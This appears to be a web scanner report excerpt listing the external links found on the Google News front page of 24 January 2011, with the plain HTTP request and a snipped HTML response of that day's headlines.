http://www.nytimes.com/2011/01/25/world/middleeast/25israel.html
http://www.oregonlive.com/politics/index.ssf/2011/01/2011_state_of_the_union_-_poli.html
http://www.pcmag.com/article2/0,2817,2376180,00.asp
http://www.pcmag.com/article2/0,2817,2376185,00.asp
http://www.pcworld.com/businesscenter/article/217478/firefox_donottrack_feature_has_a_fatal_flaw.html
http://www.people.com/people/article/0,,20460315,00.html
http://www.prnewswire.com/news-releases/american-heart-association-rapid-access-journal-report-lowering-blood-pressure-in-middle-aged-women-reduces-heart-disease-risk-114504829.html
http://www.reuters.com/article/idUS198178545820110124
http://www.reuters.com/article/idUSN2419720820110124
http://www.reuters.com/article/idUSN2419775920110124
http://www.reuters.com/article/idUSN2420802420110124
http://www.reuters.com/article/idUSTRE70N1KK20110124
http://www.reuters.com/article/idUSTRE70N2TQ20110124
http://www.reuters.com/article/idUSTRE70N33820110124
http://www.reuters.com/article/idUSTRE70N4AE20110124
http://www.reuters.com/article/idUSTRE70N5P220110124
http://www.reuters.com/article/idUSTRE70N5ZW20110124
http://www.reuters.com/article/idUSTRE70N64B20110124
http://www.reuters.com/article/idUSTRE70N66I20110124
http://www.reuters.com/article/idUSTRE70N6K220110124
http://www.reuters.com/article/idUSTRE70N6Q420110124
http://www.reuters.com/article/idUSTRE70N6U520110124
http://www.reuters.com/article/idUSTRE70N6VU20110124
http://www.rotoworld.com/content/playerpages/playerbreakingnews.asp?sport=NFL&id=1163&line=199317&spln=1
http://www.slate.com/id/2281146/
http://www.sportingnews.com/nfl/feed/2011-01/super-bowl-xlv/story/roethlisberger-rodgers-look-to-bounce-back-in-super-bowl
http://www.suntimes.com/3470538-417/court-emanuel-appellate-chicago-law.html
http://www.technewsworld.com/story/Firefox-Do-Not-Track-Feature-Seen-as-Toothless-71710.html
http://www.theatlantic.com/technology/archive/2011/01/the-inside-story-of-how-facebook-responded-to-tunisian-hacks/70044/
http://www.theglobeandmail.com/globe-investor/american-express-revenue-rises-13-per-cent/article1881303/
http://www.theglobeandmail.com/news/world/americas/gunman-killed-4-officers-injured-in-detroit-shooting/article1880253/
http://www.theglobeandmail.com/news/world/emanuels-name-removed-from-ballot-for-chicago-mayor-lawyer-says/article1880888/
http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/
http://www.thestreet.com/story/10982553/1/tax-preparation-halliburton-hot-trends.html?cm_ven=GOOGLEN
http://www.thestreet.com/story/10983446/1/american-express-profits-up.html?cm_ven=GOOGLEN
http://www.thirdage.com/news/rock-tenn-buys-smurfit-stone-35-billion_1-24-2011
http://www.usatoday.com/news/nation/2011-01-24-detroit-shooting_N.htm
http://www.usatoday.com/yourlife/fitness/exercise/2011-01-25-lalanneobit24_ST_N.htm?csp=ylf
http://www.vanityfair.com/online/daily/2011/01/justin-bieber-on-his-musical-inspirations-his-fans-and-trying-to-be-a-regular-kid.html
http://www.voanews.com/english/news/Blast-Kills-At-Least-10-at-Moscow-Airport-114481529.html
http://www.voanews.com/english/news/africa/Nigeria-Wants-UN-Backing-for-Military-Intervention-in-Ivory-Coast-114510399.html
http://www.voanews.com/english/news/middle-east/Palestinian-Leaders-Dispute-Leaked-Documents---114484609.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/20/AR2011012004349.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012403521.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404718.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404850.html
http://www.webmd.com/heart-disease/news/20110123/heart-disease-treatment-costs-may-triple-in-next-20-years
http://www.wired.com/epicenter/2011/01/google-voice-lsd-trip/
http://www.wired.com/threatlevel/2011/01/twitter/
http://www.youtube.com/?hl=en&tab=n1
http://www.youtube.com/watch?v=1wbQ-zmLKqg
http://www.youtube.com/watch?v=3AGVHcnCKws
http://www.youtube.com/watch?v=3i4eR4POFOw
http://www.youtube.com/watch?v=6_dUkNdoPZI
http://www.youtube.com/watch?v=90gldve1V1g
http://www.youtube.com/watch?v=A1JzTAhSoKA
http://www.youtube.com/watch?v=Ay5CfV-_438
http://www.youtube.com/watch?v=Dye1RPvkcB0
http://www.youtube.com/watch?v=Id_W6wgEIGo
http://www.youtube.com/watch?v=QMHmzs0RsUA
http://www.youtube.com/watch?v=RC1jTMh02O0
http://www.youtube.com/watch?v=V36fQu0Vk80
http://www.youtube.com/watch?v=jKYkFgMz7fQ
http://www.youtube.com/watch?v=uwXNpYAgahg
http://www.zdnet.com/blog/burnette/oops-no-copied-java-code-or-weapons-of-mass-destruction-found-in-android/2162
http://www.zeenews.com/news682964.html

Request

GET /nwshp?hl=en&tab=wn HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=qDXEt69AwgvdXC6l079_jhP-tOanccyEpdjE53HnJG9UsdjQXTKiiwDpOH_RQ7VPxt6loxW-owIeszPBWIZfbI7cevhX2bGfeLrA1_XLgTnGIuB9Oef9LAbXFE9IVa9G;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 22:43:05 GMT;HttpOnly
Date: Mon, 24 Jan 2011 22:43:05 GMT
Expires: Mon, 24 Jan 2011 22:43:05 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&cf=all&ned=us&hl=en&topic=h&num=3&output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<span class="sel"><img class="chip nav-0" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=ss&ict=ln" class="persistentblue"><img class="chip nav-ss" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=w&ict=ln" class="persistentblue"><img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&geo=detect_metro_area&ict=ln" class="persistentblue"><img class="chip nav-1" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=n&ict=ln" class="persistentblue"><img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=b&ict=ln" class="persistentblue"><img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=t&ict=ln" class="persistentblue"><img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=e&ict=ln" class="persistentblue"><img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=s&ict=ln" class="persistentblue"><img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=m&ict=ln" class="persistentblue"><img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&cf=all&ned=us&topic=ir&ict=ln" class="persistentblue"><img class="chip nav-ir" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<div id="rhc-toggler" class="rhc-toggler"><img id="rhc-toggler-image" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" class="icon rhc-toggler-icon expanded"></div>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.miamiherald.com/2011/01/21/v-fullstory/2028085/they-were-ambushed.html" class="usg-AFQjCNHZQmQghunK_mOXGjo1FQM0Oqf_eQ " title="MiamiHerald.com"><img alt="" class="" src="http://nt1.ggpht.com/news/tbn/naj4TdD_2Xxs5M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.miamiherald.com/2011/01/21/v-fullstory/2028085/they-were-ambushed.html" class="usg-AFQjCNHZQmQghunK_mOXGjo1FQM0Oqf_eQ "> MiamiHerald... </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNHqZ10lt7cdruXfdH1xAs6ct4QZGw " href="http://www.miamiherald.com/2011/01/24/2031135/slain-officers-funeral-procession.html?asset_id=Funeral%20procession%20for%20slain%20Miami-Dade%20officers&asset_type=html_module" id="MAA4AEgAUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://pheedo.msnbc.msn.com/click.phdo?i=ece7dfeabc52f4bea351b7e1dc14b312" target="_blank" class="usg-AFQjCNEPSe4_zvoHTNDJhVHgzRITYChnow " id="MAA4AEgAUAFgAmoCdXM">Police fear 'war on cops' after 11 shootings</a>
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748703555804576102430334731152.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNFKWTNERTBMgyBF7SF1954uIaH-5Q " id="MAA4AEgAUAJgAmoCdXM">Photos of the Day</a>
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.reuters.com/article/idUSTRE70N64B20110124" class="usg-AFQjCNGKvU8a77RAbuHq71cn0BfubOqx1A " title="Reuters"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/rBoIUSjhqHkkUM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.reuters.com/article/idUSTRE70N64B20110124" class="usg-AFQjCNGKvU8a77RAbuHq71cn0BfubOqx1A "> Reuters </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNEfe_UP9nwyItWlPbxKT7Wck8XZfQ " href="http://www.cbsnews.com/8301-503544_162-20029390-503544.html" id="MAA4AEgBUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUSN2419720820110124" target="_blank" class="usg-AFQjCNH3n7EELgrOBKKQkV-SndbKEp88kw " id="MAA4AEgBUAFgAmoCdXM">US spending battle looms over Obama speech</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.npr.org/2011/01/24/133188100/new-state-of-the-union-question-found-a-date-yet" target="_blank" class="usg-AFQjCNEfyBgEIPRUrTW6Q5mQtZgGGHMGoQ " id="MAA4AEgBUAJgAmoCdXM">New State Of The Union Question: Found A Date Yet?</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHnD8jGZ4-b7iXuMygTSS1YJAV5Iw " href="http://www.bloomberg.com/news/2011-01-22/obama-to-stress-competitiveness-job-creation-deficit-reduction-in-speech.html" id="MAA4AEgBUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHLfCBkbcqp8Q2u9jdOB6Se50Mnsw " href="http://www.oregonlive.com/politics/index.ssf/2011/01/2011_state_of_the_union_-_poli.html" id="MAA4AEgBUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH6o7vAlZ2pKf36F4XR66a0t_JnNQ " href="http://voices.washingtonpost.com/goingoutgurus/2011/01/where_to_watch_the_state_of_th.html" id="MAA4AEgBUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.guardian.co.uk/world/2011/jan/24/domodedovo-airport-bomb-security" class="usg-AFQjCNGVDGLOLsIm_GbjonYy-EjwCNixSQ " title="The Guardian"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/sF9Yx43EuUfcmM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.guardian.co.uk/world/2011/jan/24/domodedovo-airport-bomb-security" class="usg-AFQjCNGVDGLOLsIm_GbjonYy-EjwCNixSQ "> The Guardia... </a>
...[SNIP]...
<h2 class="title sel"> <a target="_blank" class="usg-AFQjCNHSXYfXliztkaNWmpZ7jjwek16gxA " href="http://en.rian.ru/russia/20110125/162282705.html" id="MAA4AEgCUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=90gldve1V1g">Video: 
Medvedev delays Davos trip over 'barbaric' Domodedovo tragedy
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/idUS198178545820110124" target="_blank" class="usg-AFQjCNGSAB-m5iwTzxGnMuGS88QYOM7ySw " id="MAA4AEgCUAFgAmoCdXM">Breaking News: At Least 35 Dead, 150 Injured in Moscow Airport Explosion</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHWvc5HbfGnAvgPIeDY6BBRSXxwug " href="http://www.voanews.com/english/news/Blast-Kills-At-Least-10-at-Moscow-Airport-114481529.html" id="MAA4AEgCUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHA0iKAZItKHA9EroIoCjTNS4ph1A " href="http://www.msnbc.msn.com/id/41238598/ns/world_news-europe/" id="MAA4AEgCUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFNSZmNow3mU5fl-5uIhKylIg8xhw " href="http://content.usatoday.com/communities/ondeadline/post/2011/01/bbc-at-least-10-killed-in-explosion-at-moscow-airport/1?csp=hf" id="MAA4AEgCUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG86xUGIkzfiauYZ7t_EAM4mQLkiA " href="http://www.guardian.co.uk/world/2011/jan/24/moscow-airport-bomb-kills-dozens" id="MAA4AEgCUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
</div> <img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
</div> <img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""> <span class="section-title">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.cbc.ca/arts/tv/story/2011/01/24/oprah-reunion.html" class="usg-AFQjCNFDR0QmOX6C-l_v50vKksPPaKSEzA " title="CBC.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/qMklKOy43j6_5M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.cbc.ca/arts/tv/story/2011/01/24/oprah-reunion.html" class="usg-AFQjCNFDR0QmOX6C-l_v50vKksPPaKSEzA "> CBC.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEhLfkwP3KHv_AxKWphB2eFXVLo4w " href="http://www.people.com/people/article/0,,20460315,00.html" id="MAA4AEgDUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=1wbQ-zmLKqg">Video: 
Oprah Reveals Her Big Family Secret
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://chicago.gopride.com/news/article.cfm/articleid/16138036" target="_blank" class="usg-AFQjCNHLM73pKjVmbSYzUIkwM-YRizRjZA " id="MAA4AEgDUAFgAmoCdXM">Oprah's Big Secret: Ooooo or zzzzzz?</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHu4Y7lCPXQJ2lc2u8sbaHH6Tfs7w " href="http://www.businessinsider.com/wow-how-oprahs-half-sister-discovered-they-were-related-2011-1" id="MAA4AEgDUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFIUkZzAs9Y61wWQ3duZpRqiJx8Gg " href="http://popwatch.ew.com/2011/01/24/oprah-half-sister-family-secret/" id="MAA4AEgDUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF4hVZx0KyfMaR7DUadFRt5fLq5aA " href="http://theweek.com/article/index/211389/oprahs-half-sister-revelation-a-publicity-stunt" id="MAA4AEgDUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE8lkOCVmQaNBIQdhaM5ui-PusAEw " href="http://www.longislandpress.com/2011/01/24/oprahs-sister-oprahs-half-sister/" id="MAA4AEgDUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.cbc.ca/sports/football/story/2011/01/24/sp-cutler-sprained-mcl.html" class="usg-AFQjCNHO68tPIt-RIKvL2eDyHIRPQpqkXA " title="CBC.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/7106jCsR-SIHYM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.cbc.ca/sports/football/story/2011/01/24/sp-cutler-sprained-mcl.html" class="usg-AFQjCNHO68tPIt-RIKvL2eDyHIRPQpqkXA "> CBC.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNExCKBurSTO2CpunscBMXRB8AS8rg " href="http://sportsillustrated.cnn.com/2011/writers/paul_daugherty/01/24/jay.cutler/" id="MAA4AEgEUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://sports.espn.go.com/chicago/nfl/news/story?id=6054809" target="_blank" class="usg-AFQjCNGOcyfxN0x_yhl1C7G2kN9X2Uvebw " id="MAA4AEgEUAFgAmoCdXM">A closer look at Jay Cutler's knee injury</a>
...[SNIP]...
<div class="aa-inner"><a href="http://content.usatoday.com/communities/campusrivalry/post/2011/01/dukes-coach-k-says-chicago-bears-qb-jay-cutler-should-support-team/1" target="_blank" class="usg-AFQjCNHjzljR480WHVLDV2GFli4gPC1ywg " id="MAA4AEgEUAJgAmoCdXM">Duke's Coach K says Chicago Bears QB Jay Cutler should support team</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGk8jkGEv1Mwau1rxJflyTxLLTyLQ " href="http://www.chicagobreakingsports.com/2011/01/bears-cutler-suffers-sprain-of-mcl-in-left-knee.html" id="MAA4AEgEUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGhT_d3vHMRaBJkdkY1C3b7vZZrJg " href="http://profootballtalk.nbcsports.com/2011/01/24/final-cutler-injury-update-grade-ii-mcl-tear/" id="MAA4AEgEUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGamyU16jAdCMJDs5ZkpwKdiXpkGw " href="http://nbcsports.msnbc.com/id/41239129/ns/sports-player_news/" id="MAA4AEgEUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2WdPyyjmLcRZK_1AY0NI8Eu5RwA " href="http://www.chicagobreakingsports.com/2011/01/bears-teammates-rally-behind-besieged-cutler.html" id="MAA4AEgEUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://montreal.ctv.ca/servlet/an/local/CTVNews/20110124/giffords-shooting-case-110124/20110124/?hub=MontrealHome" class="usg-AFQjCNFV1On-T35w6OaTRzPXnDoxdrDZcw " title="CTV.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/T-Xfzw4FP6yhAM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://montreal.ctv.ca/servlet/an/local/CTVNews/20110124/giffords-shooting-case-110124/20110124/?hub=MontrealHome" class="usg-AFQjCNFV1On-T35w6OaTRzPXnDoxdrDZcw "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHBvFgzzTzx9w0WGdmzzseti6ngaQ " href="http://www.reuters.com/article/idUSTRE70N6U520110124" id="MAA4AEgFUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://feeds.nytimes.com/click.phdo?i=1134bc987ca2a36b4b35055e16a29639" target="_blank" class="usg-AFQjCNHRBBkahFzpw1JR8NdswhIZNcjYIw " id="MAA4AEgFUAFgAmoCdXM">Suspect Pleads Not Guilty in Tucson Shooting</a>
...[SNIP]...
<div class="aa-inner"><a href="http://abcnews.go.com/US/jared-loughner-accused-tucson-shooter-smiles-court-appearance/story?id=12750000" target="_blank" class="usg-AFQjCNHFSESne1W6NZKJuevUCkqaTiP9mg " id="MAA4AEgFUAJgAmoCdXM">Accused Tucson Gunman Jared Loughner Smiles Through Hearing</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNElebFTmOpQ7wKik8gpIXpP1selVQ " href="http://www.9and10news.com/Category/Story/?id=279641&cID=3" id="MAA4AEgFUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEOK7cyGOy-zN-41xid_LtEjydG4Q " href="http://www.businessweek.com/news/2011-01-24/loughner-pleads-not-guilty-to-attempted-murder-charges.html" id="MAA4AEgFUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFSXfhjHN0rS0rdJf8PBDheYe6-rQ " href="http://mystateline.com/fulltext-news/?nxd_id=223216" id="MAA4AEgFUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF-e3D8cBL-34zlHFtAKxTJkVxrjQ " href="http://www.ny1.com/content/news_beats/politics/132719/suspect-in-arizona-shooting-pleads-not-guilty/Default.aspx" id="MAA4AEgFUAZgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/Entertainment/20110124/jack-lalanne-remembered-110124/" class="usg-AFQjCNEqPf2jo0bh-NTnwGk18mUUjIJQSA " title="CTV.ca"><img alt="" class="" src="http://nt0.ggpht.com/news/tbn/eBjIWpZWD7cpIM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/Entertainment/20110124/jack-lalanne-remembered-110124/" class="usg-AFQjCNEqPf2jo0bh-NTnwGk18mUUjIJQSA "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHGP9SsjzyW62sRmc_IObJzTshL0g " href="http://www.mercurynews.com/breaking-news/ci_17184991" id="MAA4AEgGUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=uwXNpYAgahg">Video: 
Fitness Guru Jack LaLanne Dead at 96
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.latimes.com/news/obituaries/la-me-jack-lalanne-20110124,0,6764075.story" target="_blank" class="usg-AFQjCNF2h3Ezfm1HF14DqaqR8JY12OIJCg " id="MAA4AEgGUAFgAmoCdXM">Jack LaLanne dies at 96; spiritual father of US fitness movement</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG2OtWhDeooSC6nGZ0XSwCL8YlTOA " href="http://www.foxnews.com/entertainment/2011/01/24/biggest-fitness-guru-time/" id="MAA4AEgGUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHCUvbbz0ZsETsJAmVKDjwuHSZcMQ " href="http://www.usatoday.com/yourlife/fitness/exercise/2011-01-25-lalanneobit24_ST_N.htm?csp=ylf" id="MAA4AEgGUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFY9XEVCdovnm3JUC4ZmzWPDVoZqw " href="http://www.catholic.org/ae/celebrity/story.php?id=40071" id="MAA4AEgGUARgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH3k-EVRZWMzJLRjpI1Ql1ccGWDqw " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012403521.html" id="MAA4AEgGUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.theglobeandmail.com/news/world/emanuels-name-removed-from-ballot-for-chicago-mayor-lawyer-says/article1880888/" class="usg-AFQjCNF4CD2pAreAYNI5YagcDWGJj7WVog " title="Globe and Mail"><img alt="" class="" src="http://nt2.ggpht.com/news/tbn/gsPtXlmrvQGLtM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/news/world/emanuels-name-removed-from-ballot-for-chicago-mayor-lawyer-says/article1880888/" class="usg-AFQjCNF4CD2pAreAYNI5YagcDWGJj7WVog "> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGJtokXRbLsVUlXcHg5zkA1i0nTdg " href="http://www.suntimes.com/3470538-417/court-emanuel-appellate-chicago-law.html" id="MAA4AEgHUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=A1JzTAhSoKA">Video: 
Emanuel Has 'No Doubt' He'll Win Ballot Fight
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.csmonitor.com/USA/2011/0124/Rahm-Emanuel-ruling-big-setback-at-a-crucial-time-in-Chicago-mayor-s-race" target="_blank" class="usg-AFQjCNHviaETBQQ4CbFKFWhs-WtpR5QLaA " id="MAA4AEgHUAFgAmoCdXM">Rahm Emanuel ruling: big setback at a crucial time in Chicago mayor's race</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEwKQiOZfU8EiZQoS5g2nyEQ2IkLQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404850.html" id="MAA4AEgHUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFJBnWLd2TgwaUXTMuZXch-7Gla7g " href="http://latino.foxnews.com/latino/politics/2011/01/24/rahm-emanuel-chicago-mayoral-race-opening-latino-candidates/" id="MAA4AEgHUANgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE9k9pvvHS3M9uwGtHG3nIJ00qnUQ " href="http://www.idahostatejournal.com/news/national/article_4f292c44-2808-11e0-86d1-001cc4c03286.html" id="MAA4AEgHUAVgCGoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style=""><a target="_blank" href="http://www.ctv.ca/CTVNews/TopStories/20110122/tunisia-montreal-110122/" class="usg-AFQjCNGCYpC-tROn3xPDxxA2H_u5qL69NQ " title="CTV.ca"><img alt="" class="" src="http://nt3.ggpht.com/news/tbn/z55aFPv78aqfWM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/TopStories/20110122/tunisia-montreal-110122/" class="usg-AFQjCNGCYpC-tROn3xPDxxA2H_u5qL69NQ "> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGf__nmauUuSabbP9kk2SvRT05zrg " href="http://online.wsj.com/article/SB10001424052748704279704576102300534990160.html?mod=googlenews_wsj" id="MAA4AEgIUABgAWoCdXM"><span class="titletext">
...[SNIP]...
